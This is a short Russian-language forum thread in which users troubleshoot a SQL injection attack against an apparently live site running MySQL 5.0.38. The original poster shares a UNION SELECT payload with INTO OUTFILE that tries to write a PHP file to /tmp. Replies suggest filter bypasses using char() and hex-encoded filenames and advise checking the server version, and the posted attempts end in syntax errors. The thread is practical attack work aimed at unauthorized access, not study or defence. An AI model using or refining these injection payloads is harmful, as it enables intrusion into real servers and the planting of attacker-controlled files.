Вобщем при вводе такова кода в строку -1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,null,null,0x66726f6d205b2 063617368205d207768697468206c6f7665202929292929,nu ll,null,null,null+from+users+into+outfile(char(39) +/tmp/aa.php+char(39))/*
пишется
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(char(39) /tmp/aa.php char(39))/*' at line 1
пробовал разные варианты, в чём суть то ошибки ?

+into+outfile+'/tmp/aa.php'/*

+into+outfile+'/tmp/aa.php'/*

Получил
the right syntax to use near '\'/tmp/aa.php\'/*' at line 1

не выйдет у тебя эта фигня, кавычки экранируются, в into outfile это не как не обойдешь
никакими чарами, никакими хексами

версию узнай
если >5 то можешь через хекс обойти

версию узнай
если >5 то можешь через хекс обойти

Как ?
5.0.38-Ubuntu_0ubuntu1

Как ?
5.0.38-Ubuntu_0ubuntu1
/tmp/aa.php ==> 0x2f746d702f61612e706870
into+outfile+0x2f746d702f61612e706870

Нифига
the right syntax to use near '0x2f746d702f61612e706870' at line 1

:(